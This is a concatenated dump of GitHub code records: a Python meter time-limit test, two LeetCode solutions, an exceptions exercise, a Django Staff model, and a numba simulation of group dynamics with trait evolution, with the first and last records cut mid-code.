o.get(lateinit, False):\n print(' /* will be initialized later */', end='', file=fh)\n else:\n if o.get(c_default, None):\n print(' =', o[c_default], end='', file=fh);\n else:\n print(' =', o[default], end='', file=fh);\n\n print(';', file=fh)\n\nwith open('options.initialize.cpp', 'w') as fh:\n options.sort(key=lambda o: o[NAME])\n options.sort(key=lambda o: len(o[NAME]))\n options.sort(key=lambda o: o[1][type])\n options.sort(key=lambda o: len(o[1][type]))\n\n for name, o in options:\n if o.get(lateinit, False):\n print('%s = %s(%s);' % (\n name.replace('.', '_'), o[set], o[default]\n ), file=fh)\n","repo_name":"braph/edev","sub_path":"src/config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":13765,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"21064012310","text":"import logging\nfrom typing import Union, Any\n\nfrom SMPCrossPlatform.src import wait\nfrom SMPCrossPlatform.src.smp_time import int_to_time, time_to_int\n\nfrom src.checks.test_configuration import TestConfiguration\nfrom src.fixtures.test_autocorrect_arifm_month_fixture import options_time_mode\n\nlogger = logging.getLogger(__name__)\n\n\ndef test_time_limits(\n conf: TestConfiguration\n) -> None:\n wakeup = conf.wake_up\n relay_block = conf.relay_block\n tool = conf.tool\n relay_block.all_off()\n\n logger.info('CHECK TIME LIMITS')\n relay_block.block_on(8)\n wait.wait(wakeup)\n\n try:\n # Включение, авторизация\n tool.auth()\n # загрузка необходимых настроек\n tool.execute(\"--t=20000 -a 5 -a 3\")\n tool.execute('--t=20000 -a 25')\n tool.auth()\n\n tool.execute(options_time_mode)\n tool.execute(f\"--t=20000 -a 2\") # -a 80\")\n tool.set_time('31.12.2012 20:59:58')\n\n wait.wait(5000)\n rass: Any = 0\n for day in range(1, 10):\n tool.set_time(\"{:02d}.01.2012 20:59:58\".format(day))\n t0: Union[str, int] = int(tool.get_value(\"-og 1\"))\n logger.info(f\"t0 = {t0}\") # test output\n\n wait.wait(4000) # 2000 - мало\n logger.info(\"Delay 4 sec\") # test output\n tool.deauth()\n # tool.execute(f'-a 42={t0 + 8}') # 8 секунд, чтобы на 4 было больше текущего времени\n current_time: int = int(tool.get_value(\"-og 1\"))\n logger.info(f\"t = {current_time}\") # test output\n\n current_time = current_time + 10\n logger.info(f\"go_sync = {current_time}\") # test output\n tool.execute(f'-a 42={current_time}')\n delta: int = int(tool.get_value(\"-ds 44\"))\n logger.info(f\"delta ={delta}\") # test output\n\n rass = rass + delta\n logger.info(f\"de-sync = {rass}\") # test output\n\n status: int = int(tool.get_value(\"-i 23\"))\n logger.info(f\"status ={status & (1 << 10)}\") # test output\n if status & (1 << 10) == 0 and rass > 50 or status & (1 << 10 != 0 and rass <= 50):\n logger.error(\"Invalid status flag with month limit\")\n logger.warning(f'test {__name__} is Failure')\n logger.info(f\"step-1-{day}\")\n\n logger.info(\"step-1\")\n tool.auth()\n # загрузка необходимых настроек\n tool.execute(\"--t=20000 -a 5 -a 3\")\n tool.execute(options_time_mode)\n tool.execute('-os 8=[2:0:1:0]')\n wait.wait(9000)\n\n tool.auth()\n\n tool.execute(f\"--t=20000 -a 2 \") # -a 80\")\n tool.set_time('31.12.2012 20:59:58')\n\n wait.wait(9000)\n sum_rass: int = 0\n rass = list(range(1, 13))\n for month in range(1, 13):\n tool.auth()\n nt_str: str = int_to_time(time_to_int(\"01.{:02d}.2013 00:00:00\".format(month)) - 1)\n logger.info(f\"nt_str = {nt_str}\") # test output\n wait.wait(9000)\n tool.set_time(nt_str)\n t0 = int(tool.get_value(\"-og 1\"))\n logger.info(f\"t0 = {t0}\") # test output\n\n tool.deauth()\n wait.wait(2000) # было 1000\n logger.info(\"Delay 2 sec\") # test output\n\n current_time = int(tool.get_value(\"-og 1\"))\n logger.info(f\"t = {current_time}\") # test output\n\n current_time = current_time + 10\n\n logger.info(f\"go_sync = {current_time}\") # test output\n tool.execute(f'-a 42={current_time}')\n delta = int(tool.get_value(\"-ds 44\"))\n logger.info(f\"delta ={delta}\") # test output\n sum_rass = sum_rass + delta\n logger.info(f\"sum_rass = {sum_rass}\") # test output\n wait.wait(1000)\n\n rass[month - 1] = delta\n status = int(tool.get_value(\"-i 23\"))\n logger.info(f\"status = {status & (1 << 10)}\") # test output\n if status & (1 << 10 == 0 and sum_rass > 50) or (status & (1 << 10) != 0 and sum_rass <= 50):\n logger.error(\"Invalid status flag with month limit\")\n logger.warning(f'test {__name__} is Failure')\n logger.info(f\"step-2-{month}\")\n\n logger.info(\"step-3\")\n sum_rass = sum_rass - 10\n\n for month_second_func in range(1, 13):\n tool.auth()\n nt_str = int_to_time(time_to_int(\"01.{:02d}.2013 00:00:00\".format(month_second_func)) + 10)\n logger.info(f\"nt_str = {nt_str}\") # test output\n wait.wait(9000)\n tool.set_time(nt_str)\n t0 = (tool.get_value(\"-og 1\"))\n logger.info(f\"t0 = {t0}\") # test output\n\n tool.deauth()\n wait.wait(2000) # было 1000\n logger.info(\"Delay 2 sec\") # test output\n\n current_time = tool.get_value(\"-og 1\")\n tool.execute(f'-a 42={int(current_time) - 10}')\n sum_rass = sum_rass - 10\n logger.info(f\"sum_rass = {sum_rass}\") # test output\n logger.info(f\"t = {current_time}\") # test output\n status = int(tool.get_value(\"-i 23\"))\n logger.info(f\"status = {status & (1 << 10)}\") # test output\n\n if (status & (1 << 10) == 0 and sum_rass > 50) or (status & (1 << 10) != 0 and sum_rass <= 50):\n logger.error(\"Invalid status flag with month limit\")\n logger.warning(f'test {__name__} is Failure')\n logger.info(f\"step-3-{month_second_func}\")\n\n logger.info(\"step-3\")\n logger.warning(f'test {__name__} is OK')\n\n except Exception as ex:\n logger.warning(f'test {__name__} is Failure')\n\n logger.error('', ex)\n","repo_name":"ArturManuilenko/1_ph_stand_tests","sub_path":"src/checks/test_time_limits.py","file_name":"test_time_limits.py","file_ext":"py","file_size_in_byte":5809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"37651996845","text":"class Solution:\n def minStoneSum(self, piles: List[int], k: int) -> int:\n piles = list(map(lambda x: -1 * x, piles))\n heapify(piles)\n # print(piles)\n for _ in range(k):\n temp = heappop(piles)\n heappush(piles, floor(temp/2))\n # print(piles)\n return -1 * sum(piles)","repo_name":"fikremariamF/A2SV","sub_path":"1962-remove-stones-to-minimize-the-total/1962-remove-stones-to-minimize-the-total.py","file_name":"1962-remove-stones-to-minimize-the-total.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"27992319737","text":"#!/usr/bin/python3\ndef list_division(my_list_1, my_list_2, list_length):\n i = 0\n div = 0\n my_list_3 = []\n while (i < list_length):\n try:\n div = (my_list_1[i] / my_list_2[i])\n except ZeroDivisionError:\n print(\"division by 0\")\n except TypeError:\n print(\"wrong type\")\n except ValueError:\n print(\"wrong type\")\n except IndexError:\n print(\"out of range\")\n finally:\n my_list_3.append(div)\n div = 0\n i += 1\n return(my_list_3)\n","repo_name":"sechchr22/holbertonschool-higher_level_programming","sub_path":"0x05-python-exceptions/4-list_division.py","file_name":"4-list_division.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"1849979758","text":"from django.db import models\nfrom .utils import upload_image_path\nfrom django.conf import settings\nfrom django.db.models.signals import post_save, pre_save\nfrom django.dispatch import receiver\nfrom middlewares.middlewares import RequestMiddleware\nfrom django.db.models import Q\n\n\nclass StaffQuerySet(models.query.QuerySet):\n def search(self, query):\n lookups = (Q(user__username__icontains=query) |\n Q(user__first_name__icontains=query) |\n Q(user__last_name__icontains=query) |\n Q(role__icontains=query) |\n Q(gender__icontains=query) |\n Q(dob__icontains=query) |\n Q(address__icontains=query) |\n Q(phone__icontains=query) |\n Q(posting__icontains=query) |\n Q(insurance_cover__icontains=query)\n )\n return self.filter(lookups).distinct()\n\n\nclass StaffManager(models.Manager):\n def get_queryset(self):\n return StaffQuerySet(self.model, using=self._db)\n\n def all(self):\n return self.get_queryset()\n\n def search(self, query):\n return self.get_queryset().search(query)\n\n\nclass Staff(models.Model):\n # STAFF_ROLE_CHOICES\n HIGH_LEVEL = 'High Level'\n MID_LEVEL = 'Mid Level'\n LOW_LEVEL = 'Low Level'\n STAFF_ROLE_CHOICES = (\n (HIGH_LEVEL, 'High Level'),\n (MID_LEVEL, 'Mid Level'),\n (LOW_LEVEL, 'Low Level'),\n )\n # GENDER_CHOICES\n MALE = 'Male'\n FEMALE = 'Female'\n OTHERS = 'Others'\n GENDER_CHOICES = (\n (MALE, 'Male'),\n (FEMALE, 'Female'),\n (OTHERS, 'Others'),\n )\n user = models.OneToOneField(\n settings.AUTH_USER_MODEL, unique=True, on_delete=models.CASCADE, related_name='user_staff', verbose_name='User'\n )\n role = models.CharField(\n max_length=100, choices=STAFF_ROLE_CHOICES, default='Low Level', verbose_name='Role'\n )\n gender = models.CharField(\n choices=GENDER_CHOICES, blank=True, null=True, max_length=10, verbose_name='gender'\n )\n dob = models.DateField(\n verbose_name='DOB', null=True, blank=True\n )\n address = models.CharField(\n max_length=255, verbose_name='Address', null=True, blank=True\n )\n phone = models.CharField(\n max_length=30, verbose_name='Phone', null=True, blank=True\n )\n posting = models.CharField(\n max_length=100, verbose_name='Posting', null=True, blank=True\n )\n insurance_cover = models.IntegerField(\n verbose_name='Insurance Cover', null=True, blank=True\n )\n image = models.ImageField(\n upload_to=upload_image_path, null=True, blank=True, verbose_name='Image'\n )\n created_at = models.DateTimeField(\n auto_now_add=True, verbose_name='Created At'\n )\n updated_at = models.DateTimeField(\n auto_now=True, verbose_name='Updated At'\n )\n\n objects = StaffManager()\n\n def __str__(self):\n return self.user.username\n\n def get_username(self):\n return self.user.username\n\n def get_name(self):\n name = None\n if self.user.first_name or self.user.last_name:\n name = self.user.get_full_name()\n else:\n name = self.user.username\n return name\n\n def get_smallname(self):\n if self.user.first_name or self.user.last_name:\n name = self.user.get_short_name()\n else:\n name = self.user.username\n return name\n\n def get_dynamic_name(self):\n if len(self.get_username()) < 13:\n name = self.get_username()\n else:\n name = self.get_smallname()\n return name\n\n def get_fields(self):\n def get_dynamic_fields(field):\n if field.name == 'x':\n return (field.name, self.x.title)\n else:\n value = \"-\"\n if not field.value_from_object(self) == None and not field.value_from_object(self) == \"\":\n value = field.value_from_object(self)\n return (field.name, value)\n return [get_dynamic_fields(field) for field in self.__class__._meta.fields]\n\n class Meta:\n verbose_name = 'Staff'\n verbose_name_plural = 'Staffs'\n ordering = ['-created_at']\n\n\n@receiver(post_save, sender=settings.AUTH_USER_MODEL)\ndef create_or_update_user_staff(sender, instance, created, **kwargs):\n if created:\n try:\n request = RequestMiddleware(get_response=None)\n request = request.thread_local.current_request\n role = request.POST.get(\"role\")\n Staff.objects.create(\n user=instance, role=role,\n )\n except:\n if instance.is_superuser:\n Staff.objects.create(\n user=instance, role=\"High Level\"\n )\n else:\n Staff.objects.create(\n user=instance\n )\n instance.user_staff.save()\n","repo_name":"NumanIbnMazid/theZoo","sub_path":"staff/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"27097959381","text":"class Solution:\n def simplifyPath(self, path: str) -> str:\n \n stack, path = [], re.split(\"/+\", path.strip(\"/\"))\n\n for p in path:\n if stack and p == \"..\":\n stack.pop()\n if not (p == \".\" or p == \"..\"):\n stack.append(\"/\" + p)\n \n return \"/\" * (stack == []) + \"\".join(stack)","repo_name":"ChengTsungPao/LeetCode","sub_path":"0071_Simplify_Path/code1.py","file_name":"code1.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"27938299239","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Oct 15 2019\nLast Update March 28 2020\n\nImplements main MLS model of group dynamics with evolution of individual traits\n\n@author: Simon van Vliet & Gil Henriques\nDepartment of Zoology\nUniversity of Britisch Columbia\nvanvliet@zoology.ubc.ca\nhenriques@zoology.ubc.ca\n\n\"\"\"\n\n\"\"\"============================================================================\nImport dependencies & define global constants\n============================================================================\"\"\"\n\nfrom numba.types import Tuple, UniTuple\nfrom numba import jit, f8, i8\nimport math\nimport numpy as np\nfrom mainCode import MlsGroupDynamics_utilities as util\nfrom mainCode import MlsGroupDynamics_main as mls\nimport time\n\n\n\"\"\"============================================================================\nGLOBAL Constants\n============================================================================\"\"\"\n\n#outputMat variables to store\nstateVar = ['NTot', 'NCoop', 'fCoop',\n 'NGroup', 'groupSizeAv', 'groupSizeMed', \n 'offspr_size','offspr_frac']\n\n\nsizeGroupMatInit = 300\nsizeGroupMatIncrement = 100\n\n#setup bins and vectors for group traits\nnBinOffsprSize = 100\nnBinOffsprFrac = 100 \n\nbinsOffsprSize = np.linspace(0, 0.5, nBinOffsprSize+1)\nbinsOffsprFrac = np.linspace(0, 1, nBinOffsprFrac+1)\n\nbinCenterOffsprSize = (binsOffsprSize[1::]+binsOffsprSize[0:-1])/2\nbinCenterOffsprFrac = (binsOffsprFrac[1::]+binsOffsprFrac[0:-1])/2\n\n#init matrix to keep mutations inbounds\noffsprFracMatrix = np.zeros((nBinOffsprFrac, nBinOffsprSize),dtype=int)\nfor ff in range(nBinOffsprFrac):\n for ss in range(nBinOffsprSize):\n offsprFracUp = binsOffsprFrac[1:]\n offsprFracLow = binsOffsprFrac[:-1]\n \n toLow = offsprFracUp[ff] < binsOffsprSize[ss]\n toHigh = offsprFracLow[ff] > (1-binsOffsprSize[ss])\n #decrease or increase offsprFracIdx till within bounds\n if toHigh:\n idx = np.arange(nBinOffsprFrac)\n withinBounds = offsprFracLow < (1 - binsOffsprSize[ss])\n offsprFracIdx = int(np.max(idx[withinBounds]))\n elif toLow:\n idx = np.arange(nBinOffsprFrac)\n withinBounds = offsprFracUp > binsOffsprSize[ss]\n offsprFracIdx = int(np.min(idx[withinBounds]))\n else:\n offsprFracIdx = ff\n offsprFracMatrix[ff, ss] = int(offsprFracIdx)\n \n\n\"\"\"============================================================================\nInit functions \n============================================================================\"\"\"\n\n#enlarges 4D group trait matrix incase there are not enough empty spaces for new groups\n@jit(Tuple((f8[:, :, :, ::1], f8[::1]))(f8[:, :, :, ::1], f8[::1]), nopython=True)\ndef expand_grpMat(grpMat, grpLUT):\n matShape = grpMat.shape\n newGrSize = matShape[1] + sizeGroupMatIncrement\n #create new matrices\n grpMatNew = np.zeros((matShape[0], newGrSize, matShape[2], matShape[3]))\n grpLUTNew = np.full(newGrSize, np.nan)\n #store old values\n grpMatNew[:, 0:matShape[1], :, :] = grpMat\n grpLUTNew[0:matShape[1]] = grpLUT\n return (grpMatNew, grpLUTNew) \n\n# initialize outputMat matrix\ndef init_outputMat_matrix(model_par):\n sampleInt = model_par['sampleInt']\n maxT = model_par['maxT']\n numTSample = int(np.ceil(maxT / sampleInt) + 1)\n \n addVar = ['time']\n stateVarPlus = stateVar + \\\n ['N%i' % x for x in range(model_par['indv_NType'])] + \\\n ['N%imut' % x for x in range(model_par['indv_NType'])]\n\n # init outputMat matrix\n dTypeList1 = [(x, 'f8') for x in stateVarPlus]\n dTypeList2 = [(x+'_mav', 'f8') for x in stateVarPlus]\n dTypeList3 = [(x, 'f8') for x in addVar]\n dTypeList = dTypeList1 + dTypeList2 + dTypeList3\n dType = np.dtype(dTypeList)\n\n # initialize outputMats to NaN\n outputMat = np.full(numTSample, np.nan, dType)\n outputMat['time'][0] = 0\n\n # init matrix to track distribution replication strategies \n traitDistr = np.full((numTSample, nBinOffsprFrac, nBinOffsprSize), np.nan)\n\n return (outputMat, traitDistr)\n\n\n# initialize group matrix\n# each column is a group and lists number of [A,A',B,B'] cells\ndef init_grpMat(model_par):\n # grpMat is 4D matrix of:\n # [cell type / group id / fraction cells to offspring / fractional size of offspring]\n # grpMat2D is 2D matrix of:\n # [cell type / group id]\n # grpLUT maps location of group i within 4D grpMat to location of group i in 2D grpMat2D\n # grpLUT[i] is column index of group i within grpMat2D\n # np.nan indicates unassigned groups\n # to go from group j (column index) in grpMat2D to index i in 4D grpMat use:\n # i = np.nonzero(grpLUT==j)\n \n #get properties\n NGroup = int(model_par[\"init_groupNum\"])\n NType = int(model_par['indv_NType'])\n\n #get group reproduction traits\n offspr_size, offspr_frac = [float(model_par[x])\n for x in ('offspr_sizeInit', 'offspr_fracInit')]\n\n #check rates\n if offspr_size > 0.5:\n print('cannot do that: offspr_size < 0.5 and offspr_size < offspr_frac < 1')\n raise ValueError\n elif offspr_frac < offspr_size or offspr_frac > (1-offspr_size):\n print('cannot do that: offspr_frac should be offspr_size < offspr_frac < 1-offspr_size')\n raise ValueError\n\n #discretize traits\n offspr_size_idx = min(nBinOffsprSize, round(nBinOffsprSize * offspr_size / 0.5))\n offspr_frac_idx = min(nBinOffsprFrac, round(nBinOffsprFrac * offspr_frac / 1))\n \n offspr_frac_idx = offsprFracMatrix[offspr_frac_idx, offspr_size_idx]\n\n #create group composition vector\n nCoop = round(model_par[\"init_groupDens\"] * model_par['init_fCoop'] / model_par['indv_NType'])\n nDef = round(model_par[\"init_groupDens\"] * (1 - model_par['init_fCoop']) / model_par['indv_NType'])\n \n # init all groups with zero\n grpMat = np.zeros((NType * 2, sizeGroupMatInit, nBinOffsprFrac, nBinOffsprSize), order='C')\n grpMat2D = np.zeros((NType * 2, NGroup), order='C')\n\n # set group prop\n grpMat[0::2, 0:NGroup, offspr_frac_idx, offspr_size_idx] = nCoop\n grpMat[1::2, 0:NGroup, offspr_frac_idx, offspr_size_idx] = nDef\n grpMat2D[0::2, :] = nCoop\n grpMat2D[1::2, :] = nDef\n \n #create group LUT to connect 4D and 2D matrices\n grpLUT = np.full(sizeGroupMatInit, np.nan)\n grpLUT[0:NGroup] = np.arange(NGroup)\n\n return (grpMat, grpMat2D, grpLUT)\n\n\n\"\"\"============================================================================\nSample model code \n============================================================================\"\"\"\n@jit(Tuple((f8[:, ::1], f8, f8))(f8[:, :, :, ::1], f8[:]), nopython=True)\ndef summarize_grpMat(grpMat, grpLUT):\n #matrix with number per type\n #find existing groups and sum over all groups and cell types\n hasGrps = np.logical_not(np.isnan(grpLUT))\n traitDistr = grpMat[:,hasGrps,:,:].sum(axis=0).sum(axis=0) \n cellNumTot = traitDistr.sum()\n #calculate mean trait values using marginal distributions\n marginalSize = traitDistr.sum(axis=0) / cellNumTot\n marginalFrac = traitDistr.sum(axis=1) / cellNumTot\n av_size = np.sum(binCenterOffsprSize * marginalSize)\n av_frac = np.sum(binCenterOffsprFrac * marginalFrac)\n\n return (traitDistr, av_size, av_frac)\n\n# sample model\ndef sample_model(grpMatrix, grpMat2D, grpLUT, outputMat, traitDistr, \n sample_idx, currT, mavInt, rmsInt, stateVarPlus):\n # store time\n outputMat['time'][sample_idx] = currT\n\n # calc number of groups\n shapegrpMat = grpMat2D.shape\n NGroup = shapegrpMat[1]\n NType = int(shapegrpMat[0] / 2)\n\n # summarize groups\n traitDistrCurr, av_size, av_frac = summarize_grpMat(grpMatrix, grpLUT)\n\n # get group statistics\n NTot, NCoop, groupSizeAv, groupSizeMed, NTot_type, fCoop_group, grSizeVec = mls.calc_cell_stat(\n grpMat2D)\n\n # calc total population sizes\n for tt in range(NType):\n outputMat['N%i' %tt][sample_idx] = NTot_type[tt*2]\n outputMat['N%imut' %tt][sample_idx] = NTot_type[tt*2+1]\n \n outputMat['NTot'][sample_idx] = NTot\n outputMat['NCoop'][sample_idx] = NCoop\n outputMat['fCoop'][sample_idx] = NCoop / NTot\n \n outputMat['NGroup'][sample_idx] = NGroup\n outputMat['groupSizeAv'][sample_idx] = groupSizeAv\n outputMat['groupSizeMed'][sample_idx] = groupSizeMed\n\n outputMat['offspr_size'][sample_idx] = av_size\n outputMat['offspr_frac'][sample_idx] = av_frac\n\n #calc moving average \n if sample_idx >= 1:\n for varname in stateVarPlus:\n outname = varname + '_mav'\n mav, _ = util.calc_moving_av(\n outputMat[varname], sample_idx, mavInt)\n outputMat[outname][sample_idx] = mav\n\n # store distribution of traits\n traitDistr[sample_idx, :, :] = traitDistrCurr / NTot\n\n sample_idx += 1\n return sample_idx\n\n# sample model\ndef sample_nan(grpMatrix, outputMat, traitDistr, \n sample_idx, currT, mavInt, rmsInt, stateVarPlus):\n # store time\n outputMat['time'][sample_idx] = currT\n\n # calc total population sizes\n for varname in stateVarPlus:\n outname = varname + '_mav'\n outputMat[varname][sample_idx] = np.nan\n outputMat[outname][sample_idx] = np.nan\n\n traitDistr[sample_idx, :, :] = np.nan\n\n return None\n\n# sample model\ndef sample_extinction(outputMat, traitDistr, sample_idx, currT, stateVarPlus):\n # store time\n outputMat['time'][sample_idx] = currT\n\n # calc total population sizes\n for varname in stateVarPlus:\n outname = varname + '_mav'\n outputMat[varname][sample_idx] = 0\n outputMat[outname][sample_idx] = 0 \n\n # calc distribution groupsizes\n traitDistr[sample_idx, :, :] = 0\n sample_idx += 1\n\n return sample_idx\n\n\"\"\"============================================================================\nSub functions individual dynamics \n============================================================================\"\"\"\n# process individual level events\n@jit(i8(f8[:, :, :, ::1], f8[:, ::1], f8[::1], f8[::1], f8[::1], i8, i8, f8, f8, f8), nopython=True)\ndef process_indv_event(grpMat, grpMat2D, grpLUT, indvRate, rand, \n NType, NGroup, mutR_type, mutR_size, mutR_frac):\n # Note: grpMat and grpMat2D are updated in place, they don't have to be returned \n NTypeWMut = NType*2\n \n # select random event based on propensity\n eventID = util.select_random_event(indvRate, rand[0])\n # get event type\n eventType = math.floor(eventID / NGroup)\n # get event group\n grpIdx2D = eventID % NGroup # % is modulo operator\n typeIdx = eventType % NTypeWMut\n #find corresponding group in 4D array\n grpIdx4D = int(np.nonzero(grpLUT==grpIdx2D)[0].item())\n \n #find reproduction trait of affected cell\n fracIdx, sizeIdx = util.select_random_event_2D(grpMat[typeIdx, grpIdx4D, :, :], rand[1]) \n\n # track if any groups die in process\n groupDeathID = -1 # -1 is no death\n\n #process event \n if eventType < NTypeWMut: # birth event\n # check for mutation in cell type\n isWT = (typeIdx % 2) == 0 # Wild type cell\n typeMutates = rand[2] < mutR_type # mutates to other type\n offsprTypeIdx = typeIdx + 1 if (isWT and typeMutates) else typeIdx\n\n #check for mutation in offspring size\n if rand[3] < mutR_size / 2: # offspring size mutates to lower value\n offsprSizeIdx = max(0, sizeIdx - 1)\n elif rand[3] < mutR_size: # offspring size mutates to lower value\n offsprSizeIdx = min(nBinOffsprSize - 1, sizeIdx + 1)\n else:\n offsprSizeIdx = sizeIdx\n\n #check for mutation in offspring fraction\n if rand[4] < mutR_frac / 2: # offspring size mutates to lower value\n offsprFracIdx = max(0, fracIdx - 1)\n elif rand[4] < mutR_frac: # offspring size mutates to lower value\n offsprFracIdx = min(nBinOffsprFrac - 1, fracIdx + 1)\n else:\n offsprFracIdx = fracIdx\n\n #make sure we stay inside allowed trait space\n offsprFracIdx = offsprFracMatrix[offsprFracIdx, offsprSizeIdx]\n \n # place new offspring\n grpMat[offsprTypeIdx, grpIdx4D, offsprFracIdx, offsprSizeIdx] += 1\n grpMat2D[offsprTypeIdx, grpIdx2D] += 1\n\n else: # death event\n # remove cell from group\n if grpMat[typeIdx, grpIdx4D, fracIdx, sizeIdx]==0:\n raise NameError(\"no cell to kill\")\n grpMat[typeIdx, grpIdx4D, fracIdx, sizeIdx] -= 1\n grpMat2D[typeIdx, grpIdx2D] -= 1\n\n # kill group if last cell died\n # use two stage check for increased speed\n if grpMat2D[typeIdx, grpIdx2D] == 0: # killed last of type\n NINGroup = grpMat2D[:, grpIdx2D].sum()\n if NINGroup == 0: # all other types are zero too\n groupDeathID = int(grpIdx2D)\n\n return groupDeathID\n\n\n\"\"\"============================================================================\nSub functions migration dynamics \n============================================================================\"\"\"\n\n# process migration event\n@jit(i8(f8[:, :, :, ::1], f8[:, ::1], f8[::1], f8[::1], i8, i8, f8[::1]), nopython=True)\ndef process_migration_event(grpMat, grpMat2D, grpLUT, grSizeVec, NGroup, NType, rand):\n # Note: grpMat is updated in place, it does not need to be returned\n\n # select random group of origin based on size\n grpIDSource = util.select_random_event(grSizeVec, rand[0])\n #find corresponding group in 4D array\n grpIdSource4D = int(np.nonzero(grpLUT==grpIDSource)[0].item())\n\n # select random type of migrant based on population size\n typeIdx = util.select_random_event(grpMat2D[:, grpIDSource], rand[1])\n \n # find trait of affected cell\n fracIdx, sizeIdx = util.select_random_event_2D(grpMat[typeIdx, grpIDSource, :, :], rand[2])\n \n # select random target group\n grpIDTarget = int(np.floor(rand[3] * NGroup))\n #find corresponding group in 4D array\n grpIdTarget4D = np.nonzero(grpLUT==grpIDTarget)[0].item()\n\n #perform migration\n grpMat[typeIdx, grpIdSource4D, fracIdx, sizeIdx] -= 1\n grpMat[typeIdx, grpIdTarget4D, fracIdx, sizeIdx] += 1\n \n grpMat2D[typeIdx, grpIDSource] -= 1\n grpMat2D[typeIdx, grpIDTarget] += 1\n\n # track if any groups die in process\n groupDeathID = int(-1) # -1 is no death\n\n # kill group if last cell died\n # use two stage check for increased speed\n if grpMat2D[typeIdx, grpIDSource] == 0: # killed last of type\n NINGroup = grpMat2D[:, grpIDSource].sum()\n if NINGroup == 0: # all other types are zero too\n groupDeathID = int(grpIDSource)\n\n return groupDeathID\n\n\n\"\"\"============================================================================\nSub functions group dynamics \n============================================================================\"\"\"\n\n# remove group from group matrix\n@jit(f8[:, ::1](f8[:, :, :, ::1], f8[:, ::1], f8[:], i8), nopython=True)\ndef remove_group(grpMat, grpMat2D, grpLUT, groupDeathID):\n #grpMat and grpLUT modified in place\n #first remove group from 4D matrix by setting its index to -1\n #find corresponding group in 4D array\n grpIdTarget4D = int(np.nonzero(grpLUT==groupDeathID)[0].item())\n #for safety set group traits to zero (should not be needed, remove for speed)\n grpLUT[grpIdTarget4D] = np.nan\n grpMat[:, grpIdTarget4D, :, :] = 0\n \n #now remove group from 2D matrix\n NGrp = grpMat2D.shape[1]\n hasDied = np.zeros(NGrp)\n hasDied[groupDeathID] = 1\n # copy remaining groups to new matrix\n grpMat2DNew = grpMat2D[:, hasDied == 0]\n grpMat2DNew = grpMat2DNew.copy()\n \n #update grpLUT to reflect changed positions\n grpLUT[grpLUT > groupDeathID] -= 1\n \n return grpMat2DNew\n\n@jit(Tuple((f8, f8, f8))(f8[:, :, ::1]), nopython=True, debug=True)\ndef calc_mean_group_prop(parentGroup):\n #parent group: type / frac / size \n #sum over all cell types \n parTraitMatrix = parentGroup.sum(axis=0)\n #number of cells in parents\n NCellPar = parTraitMatrix.sum()\n\n #calculate average trait values using marginal distributions \n marginalSize = parTraitMatrix.sum(axis=0) / NCellPar\n marginalFrac = parTraitMatrix.sum(axis=1) / NCellPar\n offspr_size = np.sum(binCenterOffsprSize * marginalSize)\n offspr_frac = np.sum(binCenterOffsprFrac * marginalFrac)\n return(offspr_size, offspr_frac, NCellPar)\n\n\n@jit(Tuple((f8[:, :, :, ::1], f8[:, ::1], f8[::1]))(f8[:, :, :, ::1], f8[:, ::1], f8[::1], i8), nopython=True)\ndef fission_group(grpMat, grpMat2D, grpLUT, eventGroup): \n #find corresponding group in 4D array\n grpIdx4D = int(np.nonzero(grpLUT==eventGroup)[0].item())\n \n #get parent group\n parentGroup = grpMat[:, grpIdx4D, :, :].copy()\n #get group properties\n offspr_size, offspr_frac, NCellPar = calc_mean_group_prop(parentGroup)\n NCellPar = int(parentGroup.sum())\n \n #distribute cells \n destinationIdx, nOffspring = mls.distribute_offspring(offspr_size, \n offspr_frac, \n NCellPar)\n \n if nOffspring > 0: \n if np.sum(destinationIdx==-1) > 0:\n #consider parent to be new group, remove old parent\n destinationIdx += 1\n nPar = 1\n else:\n nPar = 0\n \n #remove parent from 4D matrice (copy stored in parentGroup)\n grpLUT[grpIdx4D] = np.nan\n grpMat[:, grpIdx4D, :, :] = 0\n \n #find empty spots for new groups\n emptyPlaces = np.nonzero(np.isnan(grpLUT))[0] \n #check if there are enough empty sites, if not grow matrix\n if nOffspring > emptyPlaces.size - 1:\n grpMat, grpLUT = expand_grpMat(grpMat, grpLUT)\n emptyPlaces = np.nonzero(np.isnan(grpLUT))[0] \n \n #init new 2D array \n matShape2D = grpMat2D.shape\n nGrpAdded = nOffspring + nPar\n nGrpNew = matShape2D[1] + nGrpAdded - 1\n grpMat2DNew = np.zeros((matShape2D[0], nGrpNew))\n isParent = np.zeros(matShape2D[1])\n isParent[eventGroup] = 1\n \n #store existing groups at end, exclude parent \n grpMat2DNew[:, nGrpAdded::] = grpMat2D[:, isParent==0]\n grpMat2DNew = grpMat2DNew.copy()\n \n #update grpLUT to reflect new positions\n grpLUT[grpLUT > eventGroup] += (nGrpAdded - 1)\n grpLUT[grpLUT < eventGroup] += nGrpAdded\n grpLUT[emptyPlaces[0:nGrpAdded]] = np.arange(nGrpAdded)\n \n #find non zero elements\n ttIDx, ffIdx, ssIdx = np.nonzero(parentGroup)\n #loop all cells in parentgroup and assign to new group\n idx = 0\n for ii in range(ttIDx.size):\n numCell = parentGroup[ttIDx[ii], ffIdx[ii], ssIdx[ii]]\n while numCell>0:\n currDest = destinationIdx[idx]\n currDest4D = emptyPlaces[currDest]\n grpMat[ttIDx[ii],\n currDest4D,\n ffIdx[ii],\n ssIdx[ii]] += 1\n \n grpMat2DNew[ttIDx[ii],\n currDest] += 1\n numCell -= 1\n idx += 1 \n \n else:\n #nothing happens\n grpMat2DNew = grpMat2D\n \n return (grpMat, grpMat2DNew, grpLUT)\n\n# process individual level events\n@jit(Tuple((f8[:, :, :, ::1], f8[:, ::1], f8[::1]))(f8[:, :, :, ::1], 